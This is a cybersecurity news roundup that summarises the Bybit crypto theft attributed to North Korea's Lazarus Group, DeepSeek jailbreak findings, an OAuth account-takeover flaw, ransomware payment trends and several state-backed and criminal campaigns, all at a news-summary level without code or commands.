North Korea stages Bybit hack

The $1.5 billion theft is a record breaking crypto heist in history

A roundup of some of the noteworthy developments in the cybersecurity landscape, encompassing the latest vulnerability discoveries and emerging attack trends. Here are this edition’s top stories -

↘️ The North Korean Lazarus Group has been linked to a “sophisticated” attack that led to the theft of over $1.5 billion worth of cryptocurrency from one of Bybit’s cold wallets, making it the largest ever single crypto heist in history. Bybit said it detected unauthorized activity within one of our Ethereum (ETH) Cold Wallets during a planned routine transfer process on February 21, 2025, at around 12:30 p.m. UTC. The incident makes it the biggest-ever cryptocurrency heist reported to date, dwarfing that of Ronin Network ($624 million), Poly Network ($611 million), and BNB Bridge ($586 million). The attack has been attributed to a cluster dubbed TraderTraitor. [The Hacker News]

↘️ DeepSeek’s AI platform, which skyrocketed to prominence with its reasoning model R1, has been been at the receiving end of scrutiny, with multiple analyses finding ways to jailbreak its system and produce malicious or prohibited content. The findings add to a growing body of evidence that its safety protections don’t match up to those of its established competitors like OpenAI and Google. An audit by NewsGuard has further found its chatbot to be a “disinformation machine,” advancing China’s position 60% of the time in response to prompts about Chinese, Russian, and Iranian false claims. In what appears to be an interesting discovery, DeepSeek's model has also suggested that it may have received knowledge from OpenAI models, a claim that OpenAI — which trained its models on unlicensed, copyrighted data from around the web — had made. The Chinese AI company has had a whirlwind ride since it released its chatbot app on January 10, trigger panic on Wall Street and shaving off more than $600 billion from chipmaker NVIDIA’s market value — the largest single-day decline for any company in market history. [WIRED / The Hacker News]

via GIPHY

↘️ Malicious actors are advertising a new tool named Devil-Traff that claims to offer the ability to send bulk SMS messages that fuel phishing campaigns. “These bulk SMS services use features like sender ID spoofing and automated messaging to impersonate trusted sources, enabling attackers to deliver thousands of fake messages in minutes,” SlashNext said. [SlashNext]

↘️ A vulnerability discovered in an unnamed online provider of online travel services for hotels and car rentals could have exposed millions of airline customers to potential account takeovers due to a misconfiguration in the OAuth authentication process. The flaw essentially gave attackers a way to redirect a user’s OAuth credentials to a server of their choice, allowing them to obtain a valid session token from an airline’s website and use it to log into the travel company’s systems as the victim. The unauthorized access could have allowed them to book hotels and car rentals using airline loyalty points. The authentication flow goes like this: When a user clicks on the login button to access the travel company’s site, they are redirected to an airline company's login page for authentication. Once complete, the airline site sends an access token back to the travel company site, which it then uses to request user data from the airline site. The issue is that the company did not correctly verify that the sensitive authentication credentials were sent to a valid domain, meaning the token could be redirect an arbitrary site instead of the airline company. An attacker could exploit this issue by sending a malicious link to prospective targets. OAuth vulnerabilities are more common in the wild, with similar account takeover bugs found in Booking.com, Expo, Grammarly, Vidio, and Bukalapak. [The Hacker News]

↘️ Ransomware victims’ extortion payments totaled $814 million in 2024, a drop of 35% compared to the record $1.25 billion that hackers extracted from ransomware victims the previous year. The decline is attributed to the growing law enforcement success in dismantling ransomware gangs like LockBit and BlackCat, as well as heightened global awareness about the threat of ransomware, leading to more mature defenses and response plans within governments and other institutions. The vacuum left behind by major players has been filled by newer lone wolf actors who often seek smaller ransom payments. [WIRED / The Hacker News]

↘️ The threat actor known as GreenSpot has been observed targeting 163.com, a free email service operated by NetEase, to facilitate credential theft operations. The group is believed to operate from Taiwan and has been active since at least 2007. It primarily targets government, academic, and military-related entities primarily in China through phishing campaigns. [Hunt.io]

↘️ The Turkish government has proposed a controversial new cybersecurity law that could make it a criminal act to report on data breaches. “Those who carry out activities aimed at targeting institutions or individuals by creating the perception that there has been a data breach in cyberspace, even though there has been no data breach, shall be sentenced to imprisonment for a term of two to five years,” the legislation states. Concerns have been raised that such as a law may discourage people from reporting any potential data leaks. [Turkish Minute]

↘️ A subgroup within the notorious Russian state-backed hacking outfit known as Sandworm has been running a multi-year campaign to gain initial access to organizations across the world, and hand off that access to other hackers within Sandworm’s larger organization, the GRU military intelligence agency. Active since at least late 2021, the attacks are both opportunistic and targeted, using “spray and pray” attacks again internet-facing infrastructure to obtain initial access and conducting significant post-compromise activity in select targets that are strategically significant to Russia. [WIRED / The Hacker News]

↘️ Attackers are now leveraging video attachments in multimedia messages (MMS) in mobile deices to promote Bitcoin scams that lure recipients to WhatsApp investment-related groups, where scammers use high-pressure tactics to extract money or personal information. The video-based abuse has been codenamed VidSpam. “These scams often feature images of successful-looking individuals, fake awards, and promises of extraordinary daily profits,“ Proofpoint said. “Their sole goal: to convince recipients to part with their hard-earned money.“ [Proofpoint]

↘️ In recent years, there has been a trend of North Korean IT workers infiltrating international companies by securing remote positions under false identities. The rise of remote work has provided new opportunities for North Korean IT workers to gain employment in global companies, often using fraudulent profiles and front companies. This tactic not only violates international sanctions but also poses significant cybersecurity risks, including data theft and the installation of backdoors on compromised systems. North Korea has adapted to tightened sanctions by escalating its criminal activities. According to Recorded Future, at least three organizations in the broader cryptocurrency space, a market-making company, an online casino, and a software development company, were targeted as part of the Contagious Interview campaign between October and November 2024. Both the activities are attributed to a cluster referred to as CL-STA-0240, Famous Chollima, PurpleBravo, and Tenacious Pungsan. [The Hacker News]

↘️ Russian state-aligned threat actors are ramping up efforts to spy on Ukrainian military and government officials via their secure messaging applications, including Signal Messenger and WhatsApp, by using bogus group chat invites that trick them into linking their accounts with a Signal device under the attackers’ control by abusing the device linking functionality. In doing so, future messages get delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim’s secure conversations without the need for full-device compromise. Furthermore, Russian soldiers have also been conscripted to “link Signal accounts on devices captured on the battlefield back to actor-controlled infrastructure for follow-on exploitation,” Google said. Signal has released additional protections against such phishing efforts. It’s worth noting that the threat of such attacks is even greater now since Signal recently added the ability to synchronize chat history for the past 45 days between old and newly linked devices. While these efforts are currently limited to personnel of interest to Russian intelligence agencies, the tactics the threat actors are using could very well serve as a blueprint for other groups to follow suit in broader attacks on other messaging apps. [WIRED / The Hacker News]

↘️ The Chinese state-sponsored hacking group Salt Typhoon successfully broke into U.S. telcom networks via old, unpatched vulnerabilities (CVE-2018-0171) and stolen login credentials as part of a long-term sophisticated campaign. The hallmark of the campaign is the extensive use of living-off-the-land (LotL) tactics, piggybacking on built-in networking features rather than deploying traditional malware, to execute commands stealthily and deploy added malware like JumbledPath to impair detection efforts. The group then moved laterally within compromised networks and between different telecom providers, using compromised devices as stepping stones to reach other targets and avoid detection. It's also said to have repeatedly cleared relevant logs to obfuscate their activities. [The Hacker News]

↘️ New research has found that it’s possible for attackers to bypass Microsoft Outlook’s spam filters and distribute malicious ISO files through emails without being quarantined by embedding a malicious URL under a benign-looking link. This hyperlink obfuscation trick to obscure the true destination of the hyperlink is enough to land the emails in the inbox. “This vulnerability significantly reduces the effectiveness of Outlook’s spam filtering mechanism, allowing attackers to bypass security measures and distribute malicious files,” Afine said. Previously, it was also demonstrated that attackers could bypass Microsoft Defender SmartScreen using ISO files, thereby allowing malicious executables extracted from the disk image to be run without triggering any security warnings. [Afine]

↘️ The threat actor known as Hive0137 has linked to an email spamming campaign distributing malware like DarkGate, NetSupport, and a new loader dubbed T34-Loader used for initial access in ransomware attacks. The threat cluster, which overlaps with TA571, is said to leverage large language models (LLMs) to assist in script development, as well as create authentic and unique phishing emails. “In a December 2023 campaign, Hive0137 made use of Snow crypter to inject the new T34-Loader. Of note, the Snow crypter was developed by former members of the Trickbot/Conti syndicate (aka ITG23), suggesting a relationship between threat actors for developing or using T34-Loader and ITG23,” IBM X-Force said. ITG23 is the name given to the Conti/TrickBot group. [IBM X-Force]

↘️ A global cryptocurrency affiliate network dubbed CryptoGrab has been defrauding users of millions for more than 5 years using phishing emails and other tactics. The malicious activity mimics legitimate crypto platforms and uses a structured affiliate program, enabling cybercriminals to exploit users across multiple blockchain networks through drainer tools that can automatically extract funds from targets’ wallets using a variety of obfuscation and anti-detection techniques. “CryptoGrab’s phishing campaigns are designed to trick users into entering sensitive information like private keys, seed phrases, or wallet passwords,” Abnormal Security said. “These sites often mimic legitimate cryptocurrency services, making it difficult for users to differentiate between genuine and fake platforms. Once targets provide their wallet details, CryptoGrab’s drainer tools immediately withdraw funds.” In a related development, a security researcher who goes by the name Tim found that hundreds of bogus GitHub repositories advertising cracked software and game mods to trick users into installing a variant of the Redox stealer malware. [Abnormal Security]

↘️ A serious security vulnerability found in popular stalkerware apps like Cocospy and Spyic is exposing the sensitive personal information and communications of millions of people, including email addresses, messages, photos, and call logs. The services claim to have almost 1.8 million and 875,000 registered users, respectively. Both apps have been linked to a Chinese mobile app developer named 711.icu. A similar flaw has also been unearthed in other phone surveillance tool called Spyzie that has compromised more than half a million Android devices and at least 4,900 iPhones and iPads. The bug essentially allows anyone to access the phone data, including messages, photos, and location data, as well as the email address used to sign up for the service. The flaw remains unpatched in all the three apps. [TechCrunch]

↘️ The China-backed cyber-espionage group known as “Silk Typhoon” has begun targeting organizations in the IT supply chain to gain access to their downstream customers, marking a troubling shift in the threat group's tactics, as it exploits trusted relationships to bypass security defenses. Silk Typhoon has shown considerable proficiency in exploiting zero-day vulnerabilities in many of its attacks. The threat actor uses multiple avenues to exfiltrate data after initial compromise. Prominent among them are lateral movement to cloud from on-premises, routing data through compromised hardware devices and appliances, use of covert networks to obfuscate their activity, and living-off-the land techniques of using existing built-in tools and services within the compromised environment. The threat group’s technical prowess, displayed by its ability to pivot quickly and exploit vulnerabilities with efficiency, gives it “one of the largest targeting footprints among Chinese threat actors,” Microsoft said. [The Hacker News]

↘️ Apple has removed its Advanced Data Protection (ADP) feature for iCloud from the United Kingdom with immediate effect following government demands for backdoor access to encrypted user data. “We are gravely disappointed that the protections provided by ADP will not be available to our customers in the U.K. given the continuing rise of data breaches and other threats to customer privacy,” the company said. “ADP protects iCloud data with end-to-end encryption, which means the data can only be decrypted by the user who owns it, and only on their trusted devices.” Similar calls for access to encrypted data has been proposed in Sweden. [The Hacker News]

↘️ A 23-year-old Serbian youth activist had their Android phone targeted by a zero-day exploit chain developed by Cellebrite to unlock the device and likely deploy an Android spyware called NoviSpy. The flaws combined CVE-2024-53104 with CVE-2024-53197 and CVE-2024-50302 to escalate privileges and achieve code execution. The vulnerabilities, originally present within the Linux kernel, were addressed in December 2024. CVE-2024-53104 and CVE-2024-50302 have since been addressed in Android as of early March 2025. In response to the development, Cellebrite said it will no longer allow Serbia to use its software, stating “we found it appropriate to stop the use of our products by the relevant customers at this time.” [The Hacker News]

↘️ Microsoft revealed the identities of four individuals who it said were behind an Azure Abuse Enterprise scheme that involves leveraging unauthorized access to generative artificial intelligence (GenAI) services in order to produce offensive and harmful content. The campaign, also referred to as LLMjacking, has targeted various AI service providers, with the threat actors selling the access to other criminal actors to facilitate the illicit generation of non-consensual intimate images of celebrities and other sexually explicit content in violation of its policies. [The Hacker News]

↘️ Cybersecurity researchers have flagged an active phishing campaign that’s targeting high-profile X accounts in an attempt to hijack and exploit them for fraudulent activity. “This campaign has been observed targeting a variety of individual and organization accounts such as U.S. political figures, leading international journalists, an X employee, large technology organizations, cryptocurrency organizations, and owners of valuable, short usernames,” SentinelOne said. In this campaign, users are sent bogus email messages that mimic copyright violation and suspicious login themes to trick users into clicking on a fake URL seeking X account credentials. “Once an account is taken over, the attacker swiftly locks out the legitimate owner and begins posting fraudulent cryptocurrency opportunities or links to external sites designed to lure additional targets, often with a crypto theft-related theme,” the company said. The activity has not been attributed to a specific country or any widely-tracked threat actor. [SentinelOne]

↘️ Retailers are hiring “intermediary firms” to algorithmically tweak their prices for the same products, a technique known as surveillance pricing. “Instead of a price or promotion being a static feature of a product, the same product could have a different price or promotion based on a variety of inputs—including consumer-related data and their behaviors and preferences, the location, time, and channels by which a consumer buys the product,” the U.S. Federal Trade Commission (FTC) said. This includes details like a person’s precise location or browser history, and even behaviors ranging from mouse movements on a web page to the type of products that consumers leave unpurchased in an online shopping cart. The disclosure comes in the aftermath of a report from 404 Media that found location-tracking company Fog Data Science, which sells its services to police departments, to be apparently using addresses and coordinates of doctors' and lawyers' offices and other types of locations to help law enforcement compile lists of places visited by suspects. [FTC]

↘️ The threat actor known as SideWinder has expanded its targeting beyond its usual sectors and widened the geographical scope of its operations to include maritime and logistics organizations, as well as entities in the nuclear energy sector. The attacks involve the use of spear-phishing lures to deploy a post-exploitation toolkit named StealerBot that's capable of executing a wide range of malicious actions, including installing additional malware, capturing screenshots and logging keystrokes on compromised systems, swiping passwords, grabbing remote desktop login information, stealing files, and escalating privileges. [The Hacker News]

↘️ The U.S. Department of Justice (DoJ) announced charges against 12 Chinese nationals for their alleged participation in a wide-ranging scheme designed to steal data and suppress free speech and dissent across the world. The defendants include eight staffers for the contractor i-Soon, two officials at China's Ministry of Public Security who allegedly worked with them, and two other alleged hackers who are said to be part of the Chinese hacker group APT27 (aka Silk Typhoon). “These malicious cyber actors, acting as freelancers or as employees of i-Soon, conducted computer intrusions at the direction of the PRC’s MPS and Ministry of State Security (MSS) and on their own initiative,” the DoJ said. “The MPS and MSS paid handsomely for stolen data.” [WIRED / The Hacker News]

↘️ A new campaign dubbed Phantom Goblin is leveraging social engineering tactics to deliver information stealing malware that collects a wide range of browser-related data, including browsing history, visited websites, login credentials, tracking data, session details, cookies, downloaded files, form inputs, personalization settings, and installed extensions. The malware strain is distributed via RAR archives containing a malicious LNK file disguised as a PDF document. Once executed, the LNK file uses PowerShell to download and execute malicious payloads from a GitHub repository. “The malware extracts browser cookies by enabling remote debugging, bypassing Chrome’s App Bound Encryption (ABE) for stealthy data exfiltration,” Cyble said. “A malicious binary establishes a Visual Studio Code (VSCode) tunnel, allowing TA to maintain unauthorized remote access while evading detection. Another payload collects browsing history, login credentials, session details, and other sensitive browser-related information before exfiltrating it to a Telegram channel.” The collected information is archived and transmitted to an attacker-controlled Telegram bot. [Cyble]

↘️ New warnings have been issued abut the persistent nature of SIM swapping attacks, which allow fraudsters to submit a request to telecom providers by posing as the victim and port out their SIM to another one that’s under their control. Techniques like phishing and social engineering are used to acquire sensitive information about the victim, such as their national ID, phone number, and card details prior to launching the attack. “In some regions, this process is safeguarded by a Government E-Verification Platform, which requires users to verify their identity before any SIM swap or port-out request is approved,” Group-IB said. “Verification methods may include approving a login request or using biometric authentication. To bypass these safeguards, fraudsters deceive victims into approving the verification request, often by posing as representatives of legitimate services — such as job applications or account updates.” Once threat actors gain control of a victim’s SIM, it’s used to conduct unauthorized transactions and hijack online accounts that are secured by SMS for two-factor authentication. [Group-IB]

↘️ Cybersecurity researchers have detailed a Business Email Compromise (BEC) attack where a threat actor took advantage of a compromised email server associated with one of the parties to send fraudulent emails, and steal funds fraudulently. "This B2B BEC scheme involved abusing the implicit trust between relationships amongst business partners, patiently weaved by the threat actor within days," Trend Micro said. [Trend Micro]